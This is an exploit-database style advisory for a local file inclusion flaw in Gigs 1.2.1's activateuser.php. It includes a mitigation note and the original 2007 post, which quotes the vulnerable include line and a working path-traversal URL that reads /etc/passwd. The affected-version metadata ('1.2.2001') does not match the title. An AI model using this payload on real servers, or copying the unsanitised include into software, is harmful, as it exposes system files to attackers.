Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

vendor:

Gigs

by:

bd0rk

N/A

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: Gigs

Affected Version From: 1.2.2001

Affected Version To: 1.2.2001

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

The vulnerability allows an attacker to include files from the local file system by manipulating the 'language' parameter in the activateuser.php script. By specifying a relative path to the '/etc/passwd' file, an attacker can read sensitive information such as usernames and hashed passwords.

Mitigation:

The vendor should sanitize user input and avoid directly including files based on user input. It is recommended to use absolute paths or restrict the inclusion to a specific directory.

Source

Exploit-DB raw data:

            -°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°

             2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

                              Discovered by bd0rk || SOH-Crew

                                    www.soh-crew.it.tt

                         The german Coding and IT-Security Ressource

             -°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°


Vendor: http://www.2532gigs.com

Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip

License: Free

Vulnerable Code: include_once("languages/$language/settings.php");



Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00



Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32


####The 18 years old, german Hacker bd0rk####

# milw0rm.com [2007-08-26]